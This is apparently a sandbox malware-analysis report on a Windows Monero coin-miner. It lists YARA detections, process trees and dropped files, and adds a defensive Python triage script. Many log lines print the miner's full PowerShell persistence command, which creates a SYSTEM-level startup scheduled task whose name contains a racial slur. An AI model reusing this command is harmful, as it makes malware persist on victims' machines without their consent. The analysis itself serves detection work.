                Source: 16.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 6.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 6.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 6.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 00000010.00000002.2634148822.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: Process Memory Space: m.exe PID: 2724, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: C:\Windows\Temp\wbiwcikhpmwr.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: C:\Windows\Temp\wbiwcikhpmwr.tmp, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: C:\Windows\Temp\wbiwcikhpmwr.tmp, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: classification engineClassification label: mal100.evad.mine.winEXE@21/21@1/1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeFile created: C:\Program Files\MINA
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5528:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3304:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5060:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05m4eghi.rkd.ps1
                Source: C:\Program Files\MINA\m.exeProcess created: C:\Windows\explorer.exe
                Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | ReversingLabs: Detection: 52%
Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | Virustotal: Detection: 62%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Program Files\MINA\m.exe C:\Program Files\MINA\m.exe
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (same <#zgpcu#> scheduled-task command line as above)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\MINA\m.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kbbksn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\MINA\m.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: unknown | Process created: C:\Program Files\MINA\m.exe C:\Program Files\MINA\m.exe
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (same <#zgpcu#> scheduled-task command line as above)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (same <#zgpcu#> scheduled-task command line as above)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | Process created: unknown unknown
Source: C:\Program Files\MINA\m.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (same <#zgpcu#> scheduled-task command line as above)
Source: C:\Program Files\MINA\m.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
Source: C:\Program Files\MINA\m.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (same <#kbbksn#> scheduled-task command line as above)
Source: C:\Windows\System32\conhost.exe | Process created: unknown unknown
Source: C:\Program Files\MINA\m.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (same <#zgpcu#> scheduled-task command line as above)
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | Directory created: C:\Program Files\MINA
Source: C:\Program Files\MINA\m.exe | Directory created: C:\Program Files\Google\Libs
Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | Static file information: File size 5827072 > 1048576
Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x56de00
Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp

Data Obfuscation

Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (same <#zgpcu#> scheduled-task command line as above)
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kbbksn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (same <#zgpcu#> scheduled-task command line as above)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (same <#zgpcu#> scheduled-task command line as above)
Source: C:\Program Files\MINA\m.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (same <#zgpcu#> scheduled-task command line as above)
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (same <#kbbksn#> scheduled-task command line as above)
Source: C:\Program Files\MINA\m.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (same <#zgpcu#> scheduled-task command line as above)
Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | Static PE information: section name: .xdata
Source: m.exe.0.dr | Static PE information: section name: .xdata
Source: wbiwcikhpmwr.tmp.6.dr | Static PE information: section name: _RANDOMX
Source: wbiwcikhpmwr.tmp.6.dr | Static PE information: section name: _TEXT_CN
Source: wbiwcikhpmwr.tmp.6.dr | Static PE information: section name: _TEXT_CN
Source: wbiwcikhpmwr.tmp.6.dr | Static PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848E1D2A5 pushad ; iretd 2_2_00007FF848E1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848F37B9A push eax; ret 2_2_00007FF848F37BA9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848F37BD3 push eax; ret 2_2_00007FF848F37BA9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848F3754D push ebx; iretd 2_2_00007FF848F3756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848F300BD pushad ; iretd 2_2_00007FF848F300C1
Source: C:\Windows\System32\conhost.exe | Code function: 10_2_00007FF6B29925AC push rsi; ret 10_2_00007FF6B29925C6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF848E0D2A5 pushad ; iretd 11_2_00007FF848E0D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF848F23A36 pushad ; ret 11_2_00007FF848F23AC9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF848F23A79 pushad ; ret 11_2_00007FF848F23AC9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF848F200BD pushad ; iretd 11_2_00007FF848F200C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF848F22325 push eax; iretd 11_2_00007FF848F2233D

Persistence and Installation Behavior

Source: C:\Program Files\MINA\m.exe | File created: C:\Program Files\Google\Libs\WR64.sys (2 entries)
Source: C:\Program Files\MINA\m.exe | File created: C:\Windows\Temp\wbiwcikhpmwr.tmp (2 entries)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | File created: C:\Program Files\MINA\m.exe
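Added triage example, not code from Joe Sandbox, from the sample or from this report: the script below takes the process-creation entries listed earlier and the dropped-file entries of this section, rebuilds the parent/child chain, extracts the scheduled-task persistence parameters (task name, binary, principal, run level, trigger, and the schtasks fallback for pre-Windows 8 hosts) from the PowerShell command line, and flags the .sys file written outside System32\drivers. The event tuples are transcribed from the report; the (source, action, detail) layout, the function names and the "suspicious task" heuristic are this example's own assumptions.

```python
"""Triage of the behaviour lines in this report (added example, not Joe Sandbox code).

Rebuilds the process chain from "Process created" entries, pulls the scheduled-task
persistence parameters out of the PowerShell command line, and flags a driver file
dropped outside System32\\drivers. EVENTS is transcribed from the report; function
names and the suspicious-task heuristic are assumptions of this example.
"""
import re
from collections import defaultdict

# Exact <#zgpcu#> command line from the report; the <#kbbksn#> entries differ only in the comment.
POWERSHELL_CMD = r"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }"""

SAMPLE = r"C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe"
M_EXE = r"C:\Program Files\MINA\m.exe"
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CONHOST = r"C:\Windows\System32\conhost.exe"

# (source process, action, detail) transcribed from the report's behaviour lines.
EVENTS = [
    ("unknown", "Process created", SAMPLE + " " + SAMPLE),
    (SAMPLE, "Process created", PS_EXE + " " + POWERSHELL_CMD),
    (PS_EXE, "Process created", CONHOST + r" C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    (SAMPLE, "File created", M_EXE),
    (M_EXE, "Process created", PS_EXE + " " + POWERSHELL_CMD),
    (M_EXE, "Process created", CONHOST + " " + CONHOST),
    (M_EXE, "Process created", r"C:\Windows\explorer.exe C:\Windows\explorer.exe"),
    (M_EXE, "Directory created", r"C:\Program Files\Google\Libs"),
    (M_EXE, "File created", r"C:\Program Files\Google\Libs\WR64.sys"),
    (M_EXE, "File created", r"C:\Windows\Temp\wbiwcikhpmwr.tmp"),
]

IMAGE_RE = re.compile(r"^(.+?\.exe)(?:\s|$)", re.IGNORECASE)


def image_of(detail):
    """Image path is the first .exe token of a 'Process created' detail; it may contain spaces."""
    m = IMAGE_RE.match(detail)
    return m.group(1) if m else detail.split()[0]


def build_process_tree(events):
    """Map each source (parent) process to the images it started, in report order."""
    tree = defaultdict(list)
    for source, action, detail in events:
        if action == "Process created":
            tree[source].append(image_of(detail))
    return dict(tree)


def parse_task_persistence(cmdline):
    """Extract persistence parameters from both branches of the command line:
    Register-ScheduledTask (Windows 8+) and the schtasks fallback for older hosts."""
    def grab(pattern):
        m = re.search(pattern, cmdline)
        return m.group(1) if m else None
    return {
        "comment_marker": grab(r"<#(\w+)#>"),            # block comment prefixed to the script
        "task_name": grab(r"-TaskName\s+'([^']+)'"),
        "binary": grab(r"-Execute\s+'([^']+)'"),
        "trigger": grab(r"New-ScheduledTaskTrigger\s+-(\w+)"),
        "user": grab(r"-User\s+'([^']+)'"),
        "run_level": grab(r"-RunLevel\s+'([^']+)'"),
        "legacy_task_name": grab(r"/tn\s+'([^']+)'"),
        "legacy_binary": grab(r"/tr\s+'+([^']+)'+"),
    }


def is_suspicious_task(task):
    """Heuristic (this example's own): SYSTEM principal, highest run level, binary outside C:\\Windows."""
    binary = (task.get("binary") or "").lower()
    return (
        (task.get("user") or "").lower() == "system"
        and (task.get("run_level") or "").lower() == "highest"
        and not binary.startswith("c:\\windows\\")
    )


def dropped_drivers(events):
    """Driver files (.sys) written anywhere other than System32\\drivers."""
    drivers_dir = "c:\\windows\\system32\\drivers\\"
    return [
        detail for _, action, detail in events
        if action == "File created"
        and detail.lower().endswith(".sys")
        and not detail.lower().startswith(drivers_dir)
    ]


def triage(events):
    """Combine the three checks into one summary for the analyst."""
    tasks = [
        parse_task_persistence(detail)
        for _, action, detail in events
        if action == "Process created" and "Register-ScheduledTask" in detail
    ]
    return {
        "tree": build_process_tree(events),
        "tasks": tasks,
        "suspicious_tasks": [t for t in tasks if is_suspicious_task(t)],
        "dropped_drivers": dropped_drivers(events),
    }


if __name__ == "__main__":
    result = triage(EVENTS)
    for parent, children in result["tree"].items():
        print(parent, "->", ", ".join(children))
    for t in result["suspicious_tasks"]:
        print("persistence:", t["task_name"], "runs", t["binary"], "as", t["user"],
              "at run level", t["run_level"], "on", t["trigger"])
    print("drivers dropped outside System32\\drivers:", result["dropped_drivers"])
```

Run as-is it prints the chain (sample -> powershell.exe; m.exe -> powershell.exe, conhost.exe, explorer.exe), the MINEINEYNIGGA task running C:\Program Files\MINA\m.exe as System at the highest run level at startup, and WR64.sys as the driver dropped outside System32\drivers. The same regexes cover the <#kbbksn#> entries, which differ from the <#zgpcu#> ones only in the comment marker, and the schtasks branch is parsed separately so a mismatch between the two branches would show up as differing task_name / legacy_task_name values.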

Hooking and other Techniques for Hiding and Protection

Source: C:\Program Files\MINA\m.exe | Module Loaded: C:\WINDOWS\TEMP\WBIWCIKHPMWR.TMP (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (62 identical entries)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
